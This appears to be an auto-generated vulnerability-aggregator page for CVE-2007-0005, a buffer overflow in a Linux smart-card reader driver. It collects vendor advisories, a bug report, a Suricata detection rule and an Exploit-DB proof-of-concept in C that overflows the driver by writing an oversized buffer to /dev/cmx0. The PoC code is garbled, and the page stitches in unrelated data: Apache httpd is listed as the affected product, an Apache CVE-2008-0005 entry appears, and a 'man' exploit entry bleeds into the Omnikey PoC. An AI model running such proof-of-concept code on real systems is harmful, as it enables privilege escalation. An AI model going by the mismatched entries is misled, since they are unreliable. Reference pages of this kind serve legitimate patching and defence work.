CVE-2007-0005
published 2007-03-10CVE-2007-0005: Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to…
PriorityP426medium6.9CVSS 2.0
AVLACMAuNCCICAC
EXPLOIT
EPSS
0.61%
45.0th percentile
Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to gain privileges.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | httpd | — | — |
CVSS provenance
nvdv2.06.9MEDIUMAV:L/AC:M/Au:N/C:C/I:C/A:C
vendor_ubuntu7.8HIGH
vendor_redhat6.9MEDIUM
vendor_apache4.3LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2007-07-19·CVSS 7.8
CVE-2006-4623 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
A flaw was discovered in dvb ULE decapsulation. A remote attacker could
send a specially crafted message and cause a denial of service.
(CVE-2006-4623)
The compat_sys_mount function allowed local users to cause a denial of
service when mounting a smbfs filesystem in compatibility mode.
(CVE-2006-7203)
The Omnikey CardMan 4040 driver (cm4040_cs) did not limit the size of
buffers passed to read() and write(). A local attacker could exploit
this to execute arbitrary code with kernel privileges. (CVE-2007-0005)
Due to an variable handling flaw in the ipv6_getsockopt_sticky()
function a local attacker could exploit the getsockopt() calls to read
arbitrary kernel memory. This could disclose sensitive data.
(CVE-2007-1
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2007-07-18·CVSS 4.0
CVE-2007-2242 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
The compat_sys_mount function allowed local users to cause a denial of
service when mounting a smbfs filesystem in compatibility mode.
(CVE-2006-7203)
The Omnikey CardMan 4040 driver (cm4040_cs) did not limit the size of
buffers passed to read() and write(). A local attacker could exploit
this to execute arbitrary code with kernel privileges. (CVE-2007-0005)
Due to a variable handling flaw in the ipv6_getsockopt_sticky()
function a local attacker could exploit the getsockopt() calls to
read arbitrary kernel memory. This could disclose sensitive data.
(CVE-2007-1000)
Ilja van Sprundel discovered that Bluetooth setsockopt calls could leak
kernel memory contents via an uninitialized stack buffer. A local
attacker c
Red Hat
security flaw
vendor_redhat·2007-03-06·CVSS 6.9
CVE-2007-0005 [MEDIUM] security flaw
security flaw
Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to gain privileges.
Apache
Apache httpd: CVE-2008-0005
vendor_apache·CVSS 4.3
CVE-2008-0005 [LOW] Apache httpd: CVE-2008-0005
Apache httpd: CVE-2008-0005
A workaround was added in the mod_proxy_ftp module. On sites where mod_proxy_ftp is enabled and a forward proxy is configured, a cross-site scripting attack is possible against Web browsers which do not correctly derive the response character set following the rules in RFC 2616. Reported to security team 2007-12-15 Issue public 2008-01-08 Update 2.0.63 released 2008-01-19 Update 2.2.8 released 2008-01-19 Affects 2.2.6, 2.2.5, 2.2.4, 2.2.3, 2.2.2, 2.2.0, 2.0.61, 2.0.59, 2.0.58, 2.0.55, 2.0.54, 2.0.53, 2.0.52, 2.0.51, 2.0.50, 2.0.49, 2.0.48, 2.0.47, 2.0.46, 2.0.45, 2.0.44, 2.0.43, 2.0.42, 2.0.40, 2.0.39, 2.0.37, 2.0.36, 2.0.35
Severity: low
GHSA
GHSA-wqq7-6mh4-2rxq: Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2
ghsa_unreviewed·2022-05-01
CVE-2007-0005 [MEDIUM] CWE-119 GHSA-wqq7-6mh4-2rxq: Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2
Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to gain privileges.
Suricata
GPL IMAP login buffer overflow attempt
suricata·2010-09-23
CVE-1999-0005 GPL IMAP login buffer overflow attempt
GPL IMAP login buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
Man Command - -H Flag Local Buffer Overflow
exploitdb·2007-04-06·CVSS 6.9
CVE-2006-4250 [MEDIUM] Man Command - -H Flag Local Buffer Overflow
Man Command - -H Flag Local Buffer Overflow
---
// source: https://www.securityfocus.com/bid/23355/info
The 'man' command is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation.
NOTE: Presumably, this issue is exploitable only when 'man' has been installed setuid.
Exploiting this issue allows attackers to execute malicious machine code with the privileges of the 'man' utility. This can result in the compromise of affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
PoC Code:
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger
* Compass Security Network Computing AG, Rapperswil, Switzerla
Exploit-DB
Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
exploitdb·2007-03-09·CVSS 6.9
CVE-2007-0005 [MEDIUM] Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
---
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger
* Compass Security Network Computing AG, Rapperswil, Switzerland.
* All rights reserved.
* http://www.csnc.ch/
*/
#include
#include
#include
#include
#include
#include
#include
int main(int argc, char *argv[]) {
int fd, i, n;
char buf[8192];
/*
* 0 1 2 3 4 5 6 7 8 9 a b c d e f ...
* 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
*/
for (i = 0; i > 8);
buf[i+1] = (char) ((i/2) & 0x00FF);
}
if ((fd = open("/dev/cmx0", O_RDWR)) %s\n", strerror(errno));
exit(errno);
}
if ((n = write(fd, buf, sizeof(buf))) %s\n", strerror(errno));
exit(errno);
}
printf("%d of %d bytes written\n", n, sizeof(buf));
exit(0);
}
Bugzilla
CVE-2007-0005 security flaw
bugzilla·2018-08-16·CVSS 6.9
CVE-2007-0005 [MEDIUM] CVE-2007-0005 security flaw
CVE-2007-0005 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to gain privileges.
Bugzilla
CVE-2007-0005 Buffer Overflow in Omnikey CardMan 4040 cmx driver
bugzilla·2007-02-23·CVSS 6.9
CVE-2007-0005 [MEDIUM] CVE-2007-0005 Buffer Overflow in Omnikey CardMan 4040 cmx driver
CVE-2007-0005 Buffer Overflow in Omnikey CardMan 4040 cmx driver
From Daniel Roethlisberger wrote
While using the Linux drivers for the CM4040 as a reference for writing a cmx
FreeBSD driver I found two buffer overflows in the Linux drivers, one in the
write() and one in the read() handler.
When calling write() with a buffer larger than 512 bytes, the driver's write
buffer overflows, allowing to overwrite the EIP and execute arbitrary code with
kernel privileges.
In read(), we have a similar problem, but coming from the device. A malicous or
buggy device sending more than 512 bytes can overflow of the driver's read
buffer, with the same effects as above.
The write() vulnerability can only be exploited by a user with direct or
indirect write access to the cmx device special file. Norma
http://fedoranews.org/cms/node/2787http://fedoranews.org/cms/node/2788http://kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.21-rc3http://secunia.com/advisories/24436http://secunia.com/advisories/24518http://secunia.com/advisories/24777http://secunia.com/advisories/24901http://secunia.com/advisories/25078http://secunia.com/advisories/25691http://secunia.com/advisories/26133http://secunia.com/advisories/26139http://www.debian.org/security/2007/dsa-1286http://www.mandriva.com/security/advisories?name=MDKSA-2007:078http://www.osvdb.org/33023http://www.redhat.com/support/errata/RHSA-2007-0099.htmlhttp://www.securityfocus.com/archive/1/462300/100/0/threadedhttp://www.securityfocus.com/archive/1/471457http://www.securityfocus.com/bid/22870http://www.ubuntu.com/usn/usn-486-1http://www.ubuntu.com/usn/usn-489-1http://www.vupen.com/english/advisories/2007/0872https://exchange.xforce.ibmcloud.com/vulnerabilities/32880https://issues.rpath.com/browse/RPL-1035https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11238http://fedoranews.org/cms/node/2787http://fedoranews.org/cms/node/2788http://kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.21-rc3http://secunia.com/advisories/24436http://secunia.com/advisories/24518http://secunia.com/advisories/24777http://secunia.com/advisories/24901http://secunia.com/advisories/25078http://secunia.com/advisories/25691http://secunia.com/advisories/26133http://secunia.com/advisories/26139http://www.debian.org/security/2007/dsa-1286http://www.mandriva.com/security/advisories?name=MDKSA-2007:078http://www.osvdb.org/33023http://www.redhat.com/support/errata/RHSA-2007-0099.htmlhttp://www.securityfocus.com/archive/1/462300/100/0/threadedhttp://www.securityfocus.com/archive/1/471457http://www.securityfocus.com/bid/22870http://www.ubuntu.com/usn/usn-486-1http://www.ubuntu.com/usn/usn-489-1http://www.vupen.com/english/advisories/2007/0872https://exchange.xforce.ibmcloud.com/vulnerabilities/32880https://issues.rpath.com/browse/RPL-1035https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11238
2007-03-10
Published